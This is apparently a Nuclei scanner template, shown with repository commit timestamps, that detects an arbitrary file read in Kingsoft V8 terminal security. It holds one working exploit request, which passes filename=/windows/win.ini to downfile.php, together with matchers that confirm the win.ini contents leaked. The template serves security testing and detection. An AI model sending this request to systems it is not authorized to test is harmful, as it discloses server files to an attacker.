nuclei-templates/vulnerabilities/other/kingsoft-v8-file-read.yaml

33 lines
896 B
YAML
Raw Normal View History

2022-04-07 09:45:14 +00:00
id: kingsoft-v8-file-read
info:
name: Kingsoft V8 File Read
author: ritikchaddha
severity: high
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/b6f8fbfef46ad1c3f8d5715dd19b00ca875341c2/_book/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%87%91%E5%B1%B1/%E9%87%91%E5%B1%B1%20V8%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
2022-04-07 09:45:14 +00:00
tags: kingsoft,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/htmltopdf/downfile.php?filename=/windows/win.ini"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "for 16-bit app support"
- "[extensions]"
2022-04-07 11:28:32 +00:00
condition: and
2022-04-07 09:45:14 +00:00
- type: word
part: header
words:
- "application/zip"
- type: status
status:
- 200